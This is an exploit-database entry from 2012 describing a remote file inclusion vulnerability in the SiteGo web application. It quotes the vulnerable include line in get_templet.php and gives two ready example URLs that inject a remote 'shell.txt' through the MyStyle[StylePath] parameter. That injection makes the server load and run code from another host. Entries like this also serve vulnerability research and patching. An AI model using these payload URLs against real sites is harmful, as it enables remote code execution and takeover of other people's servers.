SiteGo - Remote File Inclusion

2012-09-10T00:00:00
ID EXPLOITPACK:D58EE0C8288AA8C69C28EBF40F582A1E
Type exploitpack
Reporter L0n3ly-H34rT
Modified 2012-09-10T00:00:00

Description

SiteGo - Remote File Inclusion

                                        
                                            ############################################
### Exploit Title: SiteGo Remote File Inclusion Vulnerability
### Date: 10/09/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows 
############################################

# File affect in two styles ( get_templet.php ) on line 120:

include "$MyStyle[StylePath]/extra/css_menu.php";

# Examples :

http://127.0.0.1/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?

http://127.0.0.1/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?

############################################

# Greetz to my friendz